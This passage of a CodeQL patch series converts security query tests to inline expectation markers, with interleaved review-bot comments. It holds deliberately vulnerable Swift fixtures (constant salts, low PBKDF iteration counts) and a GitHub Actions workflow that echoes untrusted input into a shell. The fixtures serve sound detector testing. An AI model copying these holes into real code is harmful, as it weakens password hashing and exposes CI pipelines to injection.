Scrypt test cases - let scryptb1 = Scrypt(password: randomArray, salt: constantSalt, dkLen: 64, N: 16384, r: 8, p: 1) // BAD - let scryptb2 = Scrypt(password: randomArray, salt: constantStringSalt, dkLen: 64, N: 16384, r: 8, p: 1) // BAD + let scryptb1 = Scrypt(password: randomArray, salt: constantSalt, dkLen: 64, N: 16384, r: 8, p: 1) // BAD // $ Alert + let scryptb2 = Scrypt(password: randomArray, salt: constantStringSalt, dkLen: 64, N: 16384, r: 8, p: 1) // BAD // $ Alert let scryptg1 = Scrypt(password: randomArray, salt: randomSalt, dkLen: 64, N: 16384, r: 8, p: 1) // GOOD } diff --git a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected index aff512f05123..a0b4f7370321 100644 --- a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected +++ b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected 
@@ -1,3 +1,8 @@ +#select +| test.swift:37:84:37:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:37:84:37:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | +| test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | +| test.swift:44:84:44:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:44:84:44:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | +| test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | edges | test.swift:20:45:20:45 | 99999 | test.swift:33:22:33:43 | call to getLowIterationCount() | provenance | | | test.swift:33:22:33:43 | call to getLowIterationCount() | test.swift:37:84:37:84 | lowIterations | provenance | | 
@@ -10,8 +15,3 @@ nodes | test.swift:44:84:44:84 | lowIterations | semmle.label | lowIterations | | test.swift:45:84:45:84 | 80000 | semmle.label | 80000 | subpaths -#select -| test.swift:37:84:37:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:37:84:37:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | -| test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | -| test.swift:44:84:44:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:44:84:44:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | -| test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | diff --git a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.qlref b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.qlref index 81a6dda0d0f0..66492b8441e5 100644 --- a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.qlref +++ b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.qlref @@ -1 +1,2 @@ -queries/Security/CWE-916/InsufficientHashIterations.ql +query: queries/Security/CWE-916/InsufficientHashIterations.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-916/test.swift b/swift/ql/test/query-tests/Security/CWE-916/test.swift index 8786d936c1d3..6930adfe1052 100644 --- a/swift/ql/test/query-tests/Security/CWE-916/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-916/test.swift 
@@ -17,7 +17,7 @@ extension PKCS5 { } // Helper functions -func getLowIterationCount() -> Int { return 99999 } +func getLowIterationCount() -> Int { return 99999 } // $ Source func getEnoughIterationCount() -> Int { return 120120 } @@ -34,15 +34,15 @@ func test() { let enoughIterations = getEnoughIterationCount() // PBKDF1 test cases - let pbkdf1b1 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: lowIterations, keyLength: 0) // BAD - let pbkdf1b2 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: 80000, keyLength: 0) // BAD + let pbkdf1b1 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: lowIterations, keyLength: 0) // BAD // $ Alert + let pbkdf1b2 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: 80000, keyLength: 0) // BAD // $ Alert let pbkdf1g1 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: enoughIterations, keyLength: 0) // GOOD let pbkdf1g2 = PKCS5.PBKDF1(password: randomArray, salt: randomArray, iterations: 120120, keyLength: 0) // GOOD // PBKDF2 test cases - let pbkdf2b1 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: lowIterations, keyLength: 0) // BAD - let pbkdf2b2 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: 80000, keyLength: 0) // BAD + let pbkdf2b1 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: lowIterations, keyLength: 0) // BAD // $ Alert + let pbkdf2b2 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: 80000, keyLength: 0) // BAD // $ Alert let pbkdf2g1 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: enoughIterations, keyLength: 0) // GOOD let pbkdf2g2 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: 120120, keyLength: 0) // GOOD } From 4d2e16e97bfffd4a6337de1f6c433cb6dd15617d Mon Sep 17 00:00:00 2001 
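Review bot: The annotated cases in the `@@ -34,15 +34,15 @@` hunk never exercise the cutoff itself: the BAD calls use `lowIterations` (99999) and `80000`, and the GOOD calls use `120120`. An off-by-one in the query's comparison would therefore still pass this test. The 99999 case suggests the limit is 100000, though that should be confirmed against the query before relying on it. If so, one unannotated boundary line per KDF would pin it, for example `let pbkdf2g3 = PKCS5.PBKDF2(password: randomArray, salt: randomArray, iterations: 100000, keyLength: 0) // GOOD`. The body of `test()` starts outside the hunk.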
From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:59:00 +0200 Subject: [PATCH 09/15] Actions --- .../.github/workflows/reusable_workflow.yml | 10 +- .../Models/CompositeActionsSinks.expected | 6 +- .../Models/CompositeActionsSinks.qlref | 3 +- .../Models/CompositeActionsSources.expected | 12 +- .../Models/CompositeActionsSources.qlref | 4 +- .../Models/CompositeActionsSummaries.expected | 4 +- .../Models/CompositeActionsSummaries.qlref | 4 +- .../Models/ReusableWorkflowsSinks.expected | 4 +- .../Models/ReusableWorkflowsSinks.qlref | 4 +- .../Models/ReusableWorkflowsSources.expected | 4 +- .../Models/ReusableWorkflowsSources.qlref | 4 +- .../ReusableWorkflowsSummaries.expected | 4 +- .../Models/ReusableWorkflowsSummaries.qlref | 4 +- .../query-tests/Models/action1/action.yml | 16 +- .../CWE-074/.github/workflows/output1.yml | 8 +- .../CWE-074/.github/workflows/output2.yml | 18 +- .../CWE-074/OutputClobberingHigh.expected | 18 +- .../CWE-074/OutputClobberingHigh.qlref | 3 +- .../.github/workflows/artifactpoisoning51.yml | 4 +- .../.github/workflows/artifactpoisoning52.yml | 4 +- .../.github/workflows/artifactpoisoning53.yml | 4 +- .../CWE-077/.github/workflows/path1.yml | 18 +- .../CWE-077/.github/workflows/test10.yml | 4 +- .../CWE-077/.github/workflows/test11.yml | 4 +- .../CWE-077/.github/workflows/test12.yml | 8 +- .../CWE-077/.github/workflows/test13.yml | 4 +- .../CWE-077/.github/workflows/test14.yml | 4 +- .../CWE-077/.github/workflows/test15.yml | 4 +- .../CWE-077/.github/workflows/test16.yml | 6 +- .../CWE-077/.github/workflows/test2.yml | 4 +- .../CWE-077/.github/workflows/test3.yml | 4 +- .../CWE-077/.github/workflows/test4.yml | 36 +- .../CWE-077/.github/workflows/test5.yml | 4 +- .../CWE-077/.github/workflows/test6.yml | 12 +- .../CWE-077/.github/workflows/test7.yml | 4 +- .../CWE-077/.github/workflows/test8.yml | 8 +- .../CWE-077/.github/workflows/test9.yml | 4 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- 
.../CWE-077/EnvPathInjectionCritical.qlref | 3 +- .../CWE-077/EnvPathInjectionMedium.expected | 2 +- .../CWE-077/EnvPathInjectionMedium.qlref | 3 +- .../CWE-077/EnvVarInjectionCritical.expected | 74 ++-- .../CWE-077/EnvVarInjectionCritical.qlref | 3 +- .../CWE-077/EnvVarInjectionMedium.expected | 2 +- .../CWE-077/EnvVarInjectionMedium.qlref | 3 +- .../.github/workflows/comment_issue.yml | 2 +- .../CWE-078/CommandInjectionCritical.expected | 4 +- .../CWE-078/CommandInjectionCritical.qlref | 3 +- .../CWE-078/CommandInjectionMedium.expected | 2 +- .../CWE-078/CommandInjectionMedium.qlref | 3 +- .../.github/workflows/arg_injection.yml | 26 +- .../ArgumentInjectionCritical.expected | 26 +- .../CWE-088/ArgumentInjectionCritical.qlref | 3 +- .../CWE-088/ArgumentInjectionMedium.expected | 2 +- .../CWE-088/ArgumentInjectionMedium.qlref | 3 +- .../.github/actions/action1/action.yml | 2 +- .../.github/actions/action3/action.yml | 2 +- .../.github/actions/action4/action.yml | 2 +- .../.github/actions/action5/action.yml | 6 +- .../.github/actions/action6/action.yml | 2 +- .../.github/actions/action7/action.yml | 8 +- .../.github/actions/clone-repo/action.yaml | 2 +- .../external/ultralytics/actions/action.yaml | 4 +- .../.github/workflows/argus_case_study.yml | 4 +- .../.github/workflows/artifactpoisoning1.yml | 4 +- .../.github/workflows/artifactpoisoning2.yml | 4 +- .../.github/workflows/artifactpoisoning3.yml | 4 +- .../.github/workflows/artifactpoisoning4.yml | 4 +- .../.github/workflows/artifactpoisoning5.yml | 4 +- .../.github/workflows/artifactpoisoning6.yml | 6 +- .../.github/workflows/artifactpoisoning7.yml | 4 +- .../.github/workflows/artifactpoisoning8.yml | 4 +- .../.github/workflows/changed-files.yml | 12 +- .../.github/workflows/comment_issue.yml | 14 +- .../workflows/comment_issue_newline.yml | 6 +- .../workflows/composite-action-caller-3.yml | 6 +- .../workflows/composite-action-caller-4.yml | 4 +- .../CWE-094/.github/workflows/cross3.yml | 6 +- 
.../CWE-094/.github/workflows/discussion.yml | 4 +- .../.github/workflows/discussion_comment.yml | 6 +- .../.github/workflows/publishResults.yml | 4 +- .../.github/workflows/reusable-workflow.yml | 10 +- .../CWE-094/.github/workflows/gollum.yml | 8 +- .../workflows/image_link_generator.yml | 4 +- .../CWE-094/.github/workflows/inter-job0.yml | 4 +- .../CWE-094/.github/workflows/inter-job1.yml | 4 +- .../CWE-094/.github/workflows/inter-job2.yml | 4 +- .../CWE-094/.github/workflows/inter-job4.yml | 4 +- .../CWE-094/.github/workflows/inter-job5.yml | 2 +- .../CWE-094/.github/workflows/issues.yaml | 16 +- .../CWE-094/.github/workflows/json_wrap.yml | 4 +- .../CWE-094/.github/workflows/level0.yml | 4 +- .../CWE-094/.github/workflows/level1.yml | 2 +- .../.github/workflows/priv_pull_request.yml | 2 +- .../.github/workflows/pull_request_review.yml | 16 +- .../workflows/pull_request_review_comment.yml | 16 +- .../.github/workflows/pull_request_target.yml | 16 +- .../CWE-094/.github/workflows/push.yml | 20 +- .../workflows/push_and_workflow_dispatch.yml | 20 +- .../.github/workflows/reusable-workflow-1.yml | 10 +- .../.github/workflows/reusable-workflow-2.yml | 10 +- .../workflows/reusable-workflow-caller-1.yml | 2 +- .../workflows/reusable-workflow-caller-2.yml | 2 +- .../workflows/reusable-workflow-caller-3.yml | 2 +- .../CWE-094/.github/workflows/self_needs.yml | 6 +- .../CWE-094/.github/workflows/simple1.yml | 4 +- .../CWE-094/.github/workflows/simple2.yml | 4 +- .../CWE-094/.github/workflows/simple3.yml | 4 +- .../.github/workflows/slash_command2.yml | 2 +- .../CWE-094/.github/workflows/test.yml | 4 +- .../CWE-094/.github/workflows/test1.yml | 4 +- .../CWE-094/.github/workflows/test10.yml | 12 +- .../CWE-094/.github/workflows/test11.yml | 6 +- .../CWE-094/.github/workflows/test12.yml | 2 +- .../CWE-094/.github/workflows/test13.yml | 8 +- .../CWE-094/.github/workflows/test14.yml | 16 +- .../CWE-094/.github/workflows/test15.yml | 16 +- 
.../CWE-094/.github/workflows/test16.yml | 8 +- .../CWE-094/.github/workflows/test17.yml | 16 +- .../CWE-094/.github/workflows/test18.yml | 4 +- .../CWE-094/.github/workflows/test19.yml | 84 ++--- .../CWE-094/.github/workflows/test2.yml | 8 +- .../CWE-094/.github/workflows/test20.yml | 2 +- .../CWE-094/.github/workflows/test21.yml | 6 +- .../CWE-094/.github/workflows/test24.yml | 4 +- .../CWE-094/.github/workflows/test25.yml | 4 +- .../CWE-094/.github/workflows/test26.yml | 6 +- .../CWE-094/.github/workflows/test27.yml | 4 +- .../CWE-094/.github/workflows/test29.yml | 2 +- .../CWE-094/.github/workflows/test3.yml | 4 +- .../CWE-094/.github/workflows/test4.yml | 6 +- .../CWE-094/.github/workflows/test5.yml | 2 +- .../CWE-094/.github/workflows/test7.yml | 8 +- .../CWE-094/.github/workflows/test8.yml | 4 +- .../CWE-094/.github/workflows/test9.yml | 12 +- .../.github/workflows/untrusted_checkout1.yml | 4 +- .../.github/workflows/workflow_run.yml | 16 +- .../workflows/workflow_run_branches1.yml | 2 +- .../workflows/workflow_run_branches2.yml | 2 +- .../workflows/workflow_run_branches3.yml | 2 +- .../workflows/workflow_run_branches4.yml | 2 +- .../workflows/workflow_run_branches5.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 334 +++++++++--------- .../CWE-094/CodeInjectionCritical.qlref | 3 +- .../CWE-094/CodeInjectionMedium.expected | 118 +++---- .../CWE-094/CodeInjectionMedium.qlref | 3 +- .../CWE-1395/.github/workflows/test1.yml | 4 +- .../CWE-1395/UseOfKnownVulnerableAction.qlref | 4 +- .../CWE-200/.github/workflows/test1.yml | 2 +- .../CWE-200/SecretExfiltration.expected | 4 +- .../Security/CWE-200/SecretExfiltration.qlref | 4 +- .../CWE-275/.github/workflows/perms1.yml | 2 +- .../CWE-275/.github/workflows/perms10.yml | 2 +- .../CWE-275/.github/workflows/perms2.yml | 2 +- .../CWE-275/.github/workflows/perms5.yml | 2 +- .../CWE-275/.github/workflows/perms6.yml | 2 +- .../CWE-275/.github/workflows/perms7.yml | 2 +- .../CWE-275/.github/workflows/perms8.yml | 2 
+- .../CWE-275/.github/workflows/perms9.yml | 2 +- .../CWE-275/MissingActionsPermissions.qlref | 4 +- .../CWE-284/.github/workflows/test1.yml | 16 +- .../CodeExecutionOnSelfHostedRunner.qlref | 4 +- .../CWE-285/.github/workflows/test1.yml | 2 +- .../CWE-285/ImproperAccessControl.qlref | 4 +- .../workflows/secrets-in-artifacts.yml | 10 +- .../CWE-312/.github/workflows/test1.yml | 10 +- .../CWE-312/ExcessiveSecretsExposure.qlref | 4 +- .../Security/CWE-312/SecretsInArtifacts.qlref | 4 +- .../CWE-312/UnmaskedSecretExposure.qlref | 4 +- .../.github/workflows/code_injection1.yml | 2 +- .../.github/workflows/direct_cache1.yml | 4 +- .../.github/workflows/direct_cache2.yml | 4 +- .../.github/workflows/direct_cache3.yml | 4 +- .../.github/workflows/direct_cache4.yml | 4 +- .../.github/workflows/direct_cache5.yml | 4 +- .../.github/workflows/direct_cache6.yml | 4 +- .../.github/workflows/poisonable_step1.yml | 10 +- .../.github/workflows/poisonable_step2.yml | 4 +- .../.github/workflows/poisonable_step3.yml | 2 +- .../.github/workflows/poisonable_step4.yml | 2 +- .../.github/workflows/poisonable_step5.yml | 4 +- .../CachePoisoningViaCodeInjection.expected | 4 +- .../CachePoisoningViaCodeInjection.qlref | 4 +- .../CachePoisoningViaDirectCache.expected | 14 +- .../CachePoisoningViaDirectCache.qlref | 4 +- .../CachePoisoningViaPoisonableStep.expected | 16 +- .../CachePoisoningViaPoisonableStep.qlref | 4 +- .../CWE-367/.github/workflows/comment.yml | 6 +- .../CWE-367/.github/workflows/test0.yml | 6 +- .../CWE-367/.github/workflows/test4.yml | 4 +- .../CWE-367/.github/workflows/test5.yml | 8 +- .../CWE-367/.github/workflows/test6.yml | 10 +- .../UntrustedCheckoutTOCTOUCritical.expected | 22 +- .../UntrustedCheckoutTOCTOUCritical.qlref | 3 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 3 +- .../CWE-571/.github/workflows/test1.yml | 22 +- .../CWE-571/.github/workflows/test2.yml | 22 +- .../ExpressionIsAlwaysTrueCritical.qlref | 3 +- .../CWE-571/ExpressionIsAlwaysTrueHigh.qlref 
| 3 +- .../actions/dangerous-git-checkout/action.yml | 2 +- .../actions/download-artifact-2/action.yaml | 2 +- .../actions/download-artifact/action.yaml | 2 +- .../.github/actions/unpinned-tag/action.yml | 2 +- .../workflows/actor_trusted_checkout.yml | 4 +- .../workflows/artifactpoisoning101.yml | 6 +- .../.github/workflows/artifactpoisoning11.yml | 4 +- .../.github/workflows/artifactpoisoning12.yml | 4 +- .../.github/workflows/artifactpoisoning21.yml | 6 +- .../.github/workflows/artifactpoisoning22.yml | 6 +- .../.github/workflows/artifactpoisoning31.yml | 4 +- .../.github/workflows/artifactpoisoning32.yml | 4 +- .../.github/workflows/artifactpoisoning33.yml | 4 +- .../.github/workflows/artifactpoisoning34.yml | 4 +- .../.github/workflows/artifactpoisoning41.yml | 4 +- .../.github/workflows/artifactpoisoning42.yml | 4 +- .../.github/workflows/artifactpoisoning71.yml | 6 +- .../.github/workflows/artifactpoisoning81.yml | 4 +- .../.github/workflows/artifactpoisoning91.yml | 4 +- .../.github/workflows/artifactpoisoning92.yml | 6 +- .../.github/workflows/artifactpoisoning96.yml | 2 +- .../CWE-829/.github/workflows/auto_ci.yml | 18 +- .../CWE-829/.github/workflows/dependabot2.yml | 2 +- .../CWE-829/.github/workflows/dependabot3.yml | 4 +- .../TestRepo/.github/workflows/reusable.yml | 4 +- .../CWE-829/.github/workflows/gitcheckout.yml | 4 +- .../issue_comment_3rd_party_action.yml | 6 +- .../workflows/issue_comment_direct.yml | 10 +- .../workflows/issue_comment_heuristic.yml | 4 +- .../workflows/issue_comment_octokit.yml | 12 +- .../workflows/issue_comment_octokit2.yml | 8 +- .../workflows/label_trusted_checkout1.yml | 4 +- .../workflows/label_trusted_checkout2.yml | 6 +- .../CWE-829/.github/workflows/level0.yml | 10 +- .../CWE-829/.github/workflows/mend.yml | 4 +- .../CWE-829/.github/workflows/poc.yml | 8 +- .../CWE-829/.github/workflows/poc2.yml | 6 +- .../CWE-829/.github/workflows/poc3.yml | 2 +- .../CWE-829/.github/workflows/pr-workflow.yml | 44 +-- 
.../workflows/priv_pull_request_checkout.yml | 2 +- .../.github/workflows/resolve-args.yml | 2 +- .../.github/workflows/reusable_local.yml | 4 +- .../CWE-829/.github/workflows/test10.yml | 4 +- .../CWE-829/.github/workflows/test11.yml | 4 +- .../CWE-829/.github/workflows/test12.yml | 2 +- .../CWE-829/.github/workflows/test13.yml | 4 +- .../CWE-829/.github/workflows/test14.yml | 4 +- .../CWE-829/.github/workflows/test15.yml | 4 +- .../CWE-829/.github/workflows/test17.yml | 6 +- .../CWE-829/.github/workflows/test18.yml | 6 +- .../CWE-829/.github/workflows/test22.yml | 2 +- .../CWE-829/.github/workflows/test25.yml | 4 +- .../CWE-829/.github/workflows/test27.yml | 4 +- .../CWE-829/.github/workflows/test28.yml | 2 +- .../CWE-829/.github/workflows/test29.yml | 4 +- .../CWE-829/.github/workflows/test3.yml | 2 +- .../CWE-829/.github/workflows/test4.yml | 2 +- .../CWE-829/.github/workflows/test7.yml | 12 +- .../CWE-829/.github/workflows/test8.yml | 2 +- .../CWE-829/.github/workflows/test9.yml | 2 +- .../.github/workflows/unpinned_tags.yml | 6 +- .../.github/workflows/untrusted_checkout.yml | 8 +- .../.github/workflows/untrusted_checkout2.yml | 2 +- .../.github/workflows/untrusted_checkout3.yml | 2 +- .../.github/workflows/untrusted_checkout4.yml | 8 +- .../workflow_run_untrusted_checkout.yml | 4 +- .../workflow_run_untrusted_checkout_2.yml | 4 +- .../ArtifactPoisoningCritical.expected | 38 +- .../CWE-829/ArtifactPoisoningCritical.qlref | 4 +- .../CWE-829/ArtifactPoisoningMedium.expected | 2 +- .../CWE-829/ArtifactPoisoningMedium.qlref | 4 +- .../ArtifactPoisoningPathTraversal.qlref | 4 +- .../Security/CWE-829/UnpinnedActionsTag.qlref | 3 +- .../UntrustedCheckoutCritical.expected | 80 ++--- .../CWE-829/UntrustedCheckoutCritical.qlref | 3 +- .../CWE-829/UntrustedCheckoutHigh.qlref | 3 +- .../CWE-829/UntrustedCheckoutMedium.qlref | 3 +- .../CWE-829/UnversionedImmutableAction.qlref | 3 +- .../CWE-918/.github/workflows/test.yml | 2 +- .../Security/CWE-918/RequestForgery.expected 
| 4 +- .../Security/CWE-918/RequestForgery.qlref | 3 +- .../.github/workflows/malformed.yml | 2 +- .../query-tests/SyntaxError/SyntaxError.qlref | 3 +- .../workflows/defaultable_workflow.yml | 2 +- .../UnnecessaryUseOfAdvancedConfig.qlref | 3 +- 284 files changed, 1180 insertions(+), 1156 deletions(-) diff --git a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml index c2e9e17160d3..de43f610827a 100644 --- a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml +++ b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml @@ -3,14 +3,14 @@ name: Reusable workflow example on: workflow_call: inputs: - config-path: + config-path: # $ Source[actions/reusable-workflow-sinks] Source[actions/reusable-workflow-summaries] required: true type: string outputs: workflow-output1: - value: ${{ jobs.job1.outputs.job-output1 }} + value: ${{ jobs.job1.outputs.job-output1 }} # $ Alert[actions/reusable-workflow-summaries] workflow-output2: - value: ${{ jobs.job1.outputs.job-output2 }} + value: ${{ jobs.job1.outputs.job-output2 }} # $ Alert[actions/reusable-workflow-sources] secrets: token: required: true @@ -26,9 +26,9 @@ jobs: env: CONFIG_PATH: ${{ inputs.config-path }} run: | - echo ${{ inputs.config-path }} + echo ${{ inputs.config-path }} # $ Alert[actions/reusable-workflow-sinks] echo "::set-output name=step-output::$CONFIG_PATH" - name: Get changed files id: step2 - uses: tj-actions/changed-files@v40 + uses: tj-actions/changed-files@v40 # $ Source[actions/reusable-workflow-sources] diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected index 0a5bfe433e91..33f7bd28de6f 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected 
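Review bot: In the `@@ -26,9 +26,9 @@` hunk of `reusable_workflow.yml`, the `# $ Alert[actions/reusable-workflow-sinks]` marker sits on a line inside the `run: |` block scalar. YAML treats `#` there as script text, not as a comment, unlike the markers added on `config-path:`, the `value:` lines and the `uses:` line. It is worth confirming that the inline-expectations postprocessor reads markers from inside block scalars; if it only collects YAML comments, this expectation would go unmatched. The shell ignores the trailing text, so the step behaves as before, but the script string the query analyses now includes it. A YAML comment above the step, such as `# expectation markers inside run: are part of the script text`, would make that explicit.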
@@ -1,3 +1,6 @@ +#select +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | @@ -10,6 +13,3 @@ nodes | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | | action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths -#select -| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | -| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref index e5cb225ed249..d03797620365 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -1 +1,2 @@ -Models/CompositeActionsSinks.ql +query: Models/CompositeActionsSinks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected index 3be74bb8bf12..3f13be734e2e 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected 
+++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected @@ -1,3 +1,9 @@ +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | edges | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | 
@@ -13,9 +19,3 @@ nodes | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref index 3b833d669125..fcdfec84bb78 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -1,2 +1,2 @@ -Models/CompositeActionsSources.ql - +query: Models/CompositeActionsSources.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected index 067edb68bb1c..43db3e5afa27 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected @@ -1,3 +1,5 @@ +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | @@ -8,5 +10,3 @@ nodes | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref index ea9b7a304e6b..7508e12c9815 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -1,2 +1,2 @@ 